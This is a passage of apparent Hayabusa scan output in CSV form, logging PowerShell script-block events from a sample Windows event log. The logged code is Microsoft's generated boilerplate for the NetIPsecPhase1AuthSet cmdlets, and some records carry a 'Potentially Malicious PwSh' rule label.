[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 